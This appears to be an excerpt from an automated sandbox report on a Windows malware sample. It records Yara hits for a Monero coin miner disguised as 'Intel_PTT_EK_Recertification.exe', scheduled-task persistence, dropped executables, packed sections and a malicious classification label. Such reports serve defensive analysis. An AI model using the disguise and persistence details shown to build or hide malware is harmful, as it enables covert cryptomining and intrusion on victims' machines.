Source: Yara match	File source: 7.3.4ec75545d6.exe.5330000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.svchost.exe.50e0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.1720228406.0000000005330000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1723494227.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1720451138.0000000005550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1723743224.0000000005300000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4ec75545d6.exe PID: 4568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1008, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 53.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 53.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 49.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 49.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000034.00000003.3094431994.000001593B250000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000034.00000003.3094431994.000001593B250000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen

Drops password protected ZIP file

Source: file.bin.21.dr

Zip Entry: encrypted

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[2].exe.4.dr	Static PE information: section name:
Source: random[2].exe.4.dr	Static PE information: section name: .idata
Source: random[2].exe.4.dr	Static PE information: section name:
Source: bc8eaffed4.exe.4.dr	Static PE information: section name:
Source: bc8eaffed4.exe.4.dr	Static PE information: section name: .idata
Source: bc8eaffed4.exe.4.dr	Static PE information: section name:
Source: random[1].exe1.4.dr	Static PE information: section name:
Source: random[1].exe1.4.dr	Static PE information: section name: .idata
Source: random[1].exe1.4.dr	Static PE information: section name:
Source: 4ec75545d6.exe.4.dr	Static PE information: section name:
Source: 4ec75545d6.exe.4.dr	Static PE information: section name: .idata
Source: 4ec75545d6.exe.4.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\skotes.job			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A178BB	0_2_00A178BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A18860	0_2_00A18860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A17049	0_2_00A17049
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A131A8	0_2_00A131A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D4B30	0_2_009D4B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D4DE0	0_2_009D4DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A12D10	0_2_00A12D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A1779B	0_2_00A1779B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A07F36	0_2_00A07F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_009478BB	2_2_009478BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00947049	2_2_00947049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00948860	2_2_00948860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_009431A8	2_2_009431A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00904B30	2_2_00904B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00904DE0	2_2_00904DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00942D10	2_2_00942D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0094779B	2_2_0094779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00937F36	2_2_00937F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_009478BB	3_2_009478BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00947049	3_2_00947049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00948860	3_2_00948860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_009431A8	3_2_009431A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00904B30	3_2_00904B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00904DE0	3_2_00904DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00942D10	3_2_00942D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0094779B	3_2_0094779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00937F36	3_2_00937F36
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_00301000	12_2_00301000
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_00304C8C	12_2_00304C8C
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_00316F3A	12_2_00316F3A
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00301000	14_2_00301000
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00304C8C	14_2_00304C8C
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00316F3A	14_2_00316F3A
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00416124	14_2_00416124
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004229DD	14_2_004229DD
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004361F0	14_2_004361F0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004101FB	14_2_004101FB
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0043CAD0	14_2_0043CAD0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00420BF0	14_2_00420BF0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0041BC50	14_2_0041BC50
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0043D4D0	14_2_0043D4D0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0040BD67	14_2_0040BD67
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004255B0	14_2_004255B0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0042B641	14_2_0042B641
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0042BED5	14_2_0042BED5
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00438EB0	14_2_00438EB0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00409720	14_2_00409720
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004087D0	14_2_004087D0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00433867	14_2_00433867
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00416810	14_2_00416810
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00435810	14_2_00435810
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0042F090	14_2_0042F090
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0043C0A0	14_2_0043C0A0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004280AA	14_2_004280AA
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00403950	14_2_00403950
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0043D150	14_2_0043D150
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00405960	14_2_00405960
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0041D160	14_2_0041D160
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0041D970	14_2_0041D970
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004291C3	14_2_004291C3
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004351C0	14_2_004351C0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0042A1D0	14_2_0042A1D0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004061E0	14_2_004061E0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004161FA	14_2_004161FA
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0043C1A0	14_2_0043C1A0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0043C1BB	14_2_0043C1BB
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0043C1B9	14_2_0043C1B9
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0040CA50	14_2_0040CA50
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00430A60	14_2_00430A60
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00435A70	14_2_00435A70
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00427202	14_2_00427202
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00425A16	14_2_00425A16
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0043C2E0	14_2_0043C2E0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00424AF0	14_2_00424AF0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004262FB	14_2_004262FB
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00428AFD	14_2_00428AFD
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00426AA1	14_2_00426AA1
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00409350	14_2_00409350
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0040E35C	14_2_0040E35C
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0040B35D	14_2_0040B35D
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00402B60	14_2_00402B60
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00404300	14_2_00404300
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00427327	14_2_00427327
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004373C9	14_2_004373C9
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0043C380	14_2_0043C380
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00429BA0	14_2_00429BA0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00436BA0	14_2_00436BA0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00407450	14_2_00407450
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00419460	14_2_00419460
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00423460	14_2_00423460
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0041DC00	14_2_0041DC00
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0043C410	14_2_0043C410
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00427C20	14_2_00427C20
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00404C30	14_2_00404C30
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0040ACC0	14_2_0040ACC0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00410CC9	14_2_00410CC9
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00414486	14_2_00414486
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004274A0	14_2_004274A0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0041D570	14_2_0041D570
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00413DE2	14_2_00413DE2
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0043CDF0	14_2_0043CDF0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004235A0	14_2_004235A0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00421E5D	14_2_00421E5D
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0042C661	14_2_0042C661
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00406670	14_2_00406670
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00405E20	14_2_00405E20
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00424ECC	14_2_00424ECC
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004396F0	14_2_004396F0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0042868F	14_2_0042868F
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0041CE90	14_2_0041CE90
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0042C69E	14_2_0042C69E
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0042C6B0	14_2_0042C6B0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00426751	14_2_00426751
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0040E760	14_2_0040E760
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00433F68	14_2_00433F68
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00402F00	14_2_00402F00
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0043B70E	14_2_0043B70E
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00427F39	14_2_00427F39
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_004117F0	14_2_004117F0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_00421780	14_2_00421780
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0042D7B5	14_2_0042D7B5

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe 3D51B9523B387859BC0D94246DFB216CFA82F9D650C8D11BE11ED67F70E7440B

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: String function: 0030F534 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: String function: 00408010 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: String function: 00413DC0 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: String function: 00305190 appears 92 times
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: String function: 0030B767 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 009180C0 appears 260 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0091DF80 appears 36 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 009E80C0 appears 130 times

Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 652

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 44.3.Intel_PTT_EK_Recertification.exe.1e0b2150000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 53.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 53.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 52.3.Intel_PTT_EK_Recertification.exe.1593b250000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 49.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 49.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000034.00000003.3094431994.000001593B250000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 00000034.00000003.3094431994.000001593B250000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000002C.00000003.2714354475.000001E0B2150000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: file.exe	Static PE information: Section: ZLIB complexity 0.997291169959128
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.997291169959128
Source: random[1].exe.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003407005613125
Source: random[1].exe.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003407005613125
Source: 3a1a782de7.exe.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003407005613125
Source: 3a1a782de7.exe.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003407005613125
Source: random[1].exe0.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: random[1].exe0.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: 44cc35716d.exe.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: 44cc35716d.exe.4.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: random[2].exe.4.dr	Static PE information: Section: pxmrbptw ZLIB complexity 0.9944781478679989
Source: bc8eaffed4.exe.4.dr	Static PE information: Section: pxmrbptw ZLIB complexity 0.9944781478679989
Source: random[1].exe1.4.dr	Static PE information: Section: ZLIB complexity 0.9961441997232472
Source: random[1].exe1.4.dr	Static PE information: Section: hbzcjodo ZLIB complexity 0.9924452882375776
Source: 4ec75545d6.exe.4.dr	Static PE information: Section: ZLIB complexity 0.9961441997232472
Source: 4ec75545d6.exe.4.dr	Static PE information: Section: hbzcjodo ZLIB complexity 0.9924452882375776

Source: 4ec75545d6.exe, 00000007.00000003.1718070471.00000000004D9000.00000040.00000001.01000000.0000000A.sdmp, 4ec75545d6.exe, 00000007.00000003.1705339357.0000000004CA8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
Source: 4ec75545d6.exe, 00000007.00000003.1718070471.00000000004D9000.00000040.00000001.01000000.0000000A.sdmp, 4ec75545d6.exe, 00000007.00000003.1705339357.0000000004CA8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@88/39@20/9

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Code function: 14_2_004361F0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

14_2_004361F0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2384:120:WilError_03
